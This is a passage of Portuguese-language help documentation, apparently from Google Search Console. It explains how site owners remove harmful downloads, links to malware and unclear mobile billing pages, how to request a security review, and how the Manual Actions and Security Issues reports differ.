2. Solicite uma revisão

Após remover os arquivos ou confirmar que os downloads estão de acordo com as diretrizes, solicite uma revisão de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Downloads prejudiciais

Seu site oferece aos usuários um download que a Navegação segura do Google considera como malware ou software indesejado. O navegador Chrome mostrará um aviso quando os usuários visitarem seu site. Remova esses downloads do site para retirar o aviso.

1. Avalie o problema

Se esses downloads forem intencionais, remova-os do site e pule para a etapa Solicitar uma revisão.

Se esses downloads forem desconhecidos, talvez o site tenha sido invadido. Corrija essa invasão, depois encontre e remova os downloads.

2. Verifique se você consegue corrigir o problema

Consulte Criar uma equipe de suporte para ver o que é necessário para corrigir o problema sozinho ou como encontrar ajuda, se isso estiver além das suas habilidades.

3. Confirme o problema

Veja algumas páginas de exemplo no seu site para confirmar a presença desses downloads.

4. Limpe seu site

Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente. Quando estiver pronto para limpar seu site, substitua os arquivos afetados pelo último backup válido ou remova você mesmo o conteúdo de spam. Use um software antivírus para verificar os binários e outros conteúdos hospedados no seu site. Os softwares antivírus encontram muitos tipos de malware e software indesejado, mas não todos. Envie seu software para um programa antivírus ou um serviço de consolidação antivírus, como o VirusTotal, para receber indicações de possíveis problemas no software. O recurso de Navegação segura do Google aplica critérios próprios para determinar se um programa ou binário é malware ou software indesejado.

5. Confirme suas correções

Verifique se o site está em conformidade com a política de software indesejado.

6. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Links para downloads prejudiciais

Seu site tem links para páginas que oferecem downloads relacionados a malware ou software indesejado, de acordo com a Navegação segura do Google. O navegador Chrome mostrará um aviso quando os usuários visitarem seu site. Remova os links para os sites prejudiciais para retirar o aviso.

1. Avalie o problema

Se esses links forem intencionais, remova-os do site e pule para a etapa Solicitar uma revisão.

Se esses links forem desconhecidos, talvez o site tenha sido invadido.

2. Verifique se você consegue corrigir o problema

Se o site tiver sido invadido, consulte Criar uma equipe de suporte para ver o que é necessário para corrigir o problema sozinho ou como encontrar ajuda, se isso estiver além das suas habilidades.

3. Confirme o problema

 

Veja algumas páginas de exemplo no seu site para confirmar a presença desses downloads. Em alguns casos, os hackers poderão ocultar esses links se acharem que você é o proprietário do site. Por isso, acesse os URLs de amostra com a Ferramenta de inspeção de URL, faça login com uma conta diferente ou use outro computador.

4. Limpe seu site

Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente. Quando estiver pronto para limpar seu site, substitua os arquivos afetados pelo último backup válido ou remova você mesmo o conteúdo de spam.

5. Confirme suas correções

Verifique se o site está em conformidade com a política de software indesejado.

6. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Falta de informações claras sobre faturamento para dispositivos móveis

O Google detectou que seu site não exibe informações suficientes sobre cobranças para dispositivos móveis, o Chrome poderá exibir um aviso antes de o usuário carregar uma página que gere esses custos.

1. Confirme o problema

Acesse os URLs de exemplo listados no relatório para ver as páginas que não têm informações claras sobre faturamento para dispositivos móveis. Revise as diretrizes de faturamento para dispositivos móveis.

2. Corrija o problema

Corrija suas páginas de modo que elas estejam em conformidade com as práticas recomendadas de faturamento para dispositivos móveis.

3. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Qual é a diferença entre os relatórios de Ações manuais e de Problemas de segurança?

O relatório de Ações manuais lista problemas em uma página ou um site que tentam manipular nosso índice de pesquisa, mas não são necessariamente perigosos para os usuários. A maioria dos problemas relatados aqui fará com que o site ou as páginas recebam uma classificação mais baixa ou sejam omitidos dos resultados da pesquisa sem qualquer indicação visual para o usuário.

O relatório de Problemas de segurança lista indicações de que seu site foi invadido ou da presença de algum comportamento no site que possa causar danos a um visitante ou ao computador dele (por exemplo, ataques de phishing ou instalação de malware ou software indesejado no computador do usuário). Essas páginas podem aparecer com um rótulo de aviso nos resultados da pesquisa. Da mesma forma, um navegador poderá exibir uma página de aviso intersticial quando o usuário tentar acessar essas páginas.

Isso foi útil?
Como podemos melhorá-lo?